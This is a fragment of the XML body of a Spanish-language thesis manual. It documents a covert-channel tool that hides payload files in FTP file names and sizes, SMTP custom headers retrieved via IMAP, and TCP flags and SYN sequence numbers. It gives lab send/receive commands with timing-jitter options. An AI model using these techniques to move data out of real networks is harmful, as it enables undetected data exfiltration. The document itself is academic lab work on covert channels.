            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.4 FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Usa FileZilla Server como servidor FTP. El receptor se conecta directamente a la IP remota del servidor FTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="707070"/>
        </w:rPr>
        <w:t>NOTA: Para FTP el cliente (send) debe lanzarse ANTES que el servidor (receive).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 2 — Nombres de fichero (Base32)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Igual que SSH/2 pero sobre FTP. Los datos van en el nombre del fichero codificado en Base32. Los ficheros tienen tamaño cero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero cliente, luego servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal FTP --metodo 2 --host 192.168.1.34 --puerto 21 --ftp-user ftproot --ftp-pass ftproot --transfer-id RXFTP2 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXFTP2 --canal FTP --metodo 2 --host 192.168.1.34 --puerto 21 --ftp-user ftproot --ftp-pass ftproot --cifrado NINGUNO --out-file ./test/ftp/out_ftp2.bin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servidor FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto FTP. Por defecto 21.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ftp-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ftp-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre subidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 3 — Tamaño de fichero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Igual que SSH/3 pero sobre FTP. Cada byte se codifica en el tamaño del fichero (4096 + byte).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero cliente, luego servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal FTP --metodo 3 --host 192.168.1.34 --puerto 21 --ftp-user ftproot --ftp-pass ftproot --transfer-id RXFTP3 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXFTP3 --canal FTP --metodo 3 --host 192.168.1.34 --puerto 21 --ftp-user ftproot --ftp-pass ftproot --cifrado NINGUNO --out-file ./test/ftp/out_ftp3.bin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servidor FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ftp-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ftp-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre subidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.5 SMTP / IMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El emisor envía el payload por correo electrónico usando SMTP. El receptor lo recupera mediante IMAP. Usa hMailServer como servidor de correo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="707070"/>
        </w:rPr>
        <w:t>NOTA: El cliente (send) debe lanzarse ANTES que el servidor (receive): el email debe estar en el buzón cuando el receptor lo consulte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 1 — Cabeceras X-TFG-Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El payload se codifica en Base64 y se fragmenta en cabeceras MIME personalizadas (X-TFG-Data-0, X-TFG-Data-1…) distribuidas en uno o varios emails. El receptor se conecta por IMAP, localiza los emails con el transfer-id correspondiente y reconstruye el payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero cliente, luego servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal SMTP --metodo 1 --smtp-host 192.168.1.34 --smtp-port 587 --smtp-user "user@lan.local" --smtp-pass password --smtp-to "user@lan.local" --smtp-from "tfg@lan.local" --smtp-no-starttls --transfer-id RXSMTP1 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXSMTP1 --canal SMTP --metodo 1 --imap-host 192.168.1.34 --imap-port 143 --imap-user "user@lan.local" --imap-pass password --cifrado NINGUNO --out-file ./test/smtp/out_smtp1.bin</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--smtp-host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP del servidor SMTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto SMTP. Por defecto 587.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario SMTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña SMTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-to</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Destinatario del email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-from</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Remitente del email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--smtp-no-starttls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Deshabilita STARTTLS (necesario si el servidor no lo soporta).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--imap-host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP del servidor IMAP (en receive).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--imap-port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto IMAP. Por defecto 143.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--imap-user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Usuario IMAP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--imap-pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contraseña IMAP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--imap-mailbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Buzón IMAP. Por defecto INBOX.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B5"/>
        </w:rPr>
        <w:t>5.6 TCP (canales encubiertos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Los métodos 1 y 2 usan Scapy para construir paquetes TCP raw. Requieren Npcap y privilegios de Administrador en ambas máquinas. Se recomienda usar --ritmo-base-ms &gt;= 50 para evitar reordenación de paquetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 1 — Campo Flags TCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se envía como el valor del campo Flags de una cabecera TCP (8 bits disponibles). El receptor captura los paquetes TCP dirigidos al puerto de destino y extrae el campo flags de cada uno para reconstruir el payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXTCP1 --canal TCP --metodo 1 --host 0.0.0.0 --puerto 9000 --cifrado NINGUNO --out-file ./test/tcp/out_tcp1.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal TCP --metodo 1 --host 192.168.1.34 --puerto 9000 --transfer-id RXTCP1 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt --ritmo-base-ms 50 --ritmo-dispersion-ms 20</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receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto TCP de destino.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interfaz Npcap si hay múltiples adaptadores.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-base-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Delay entre paquetes (recomendado &gt;= 50 ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--ritmo-dispersion-ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Jitter +/- ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Método 2 — Número de secuencia en paquetes SYN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cada byte del payload se codifica en el campo Sequence Number de un paquete SYN TCP (seq = 1.000.000.000 + byte). El receptor captura los paquetes SYN entrantes y resta la base al campo seq para recuperar el byte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orden: primero servidor, luego cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[SERVIDOR] python tfg_cli.py --plugins-dir plugins receive --transfer-id RXTCP2 --canal TCP --metodo 2 --host 0.0.0.0 --puerto 9000 --cifrado NINGUNO --out-file ./test/tcp/out_tcp2.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[CLIENTE]  python tfg_cli.py send --canal TCP --metodo 2 --host 192.168.1.34 --puerto 9000 --transfer-id RXTCP2 --cifrado NINGUNO --recurso-tipo ARCHIVO --recurso-ubicacion C:/TFG-REPO/test_payload.txt --ritmo-base-ms 50 --ritmo-dispersion-ms 20</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receptor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Puerto TCP de destino.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>--iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
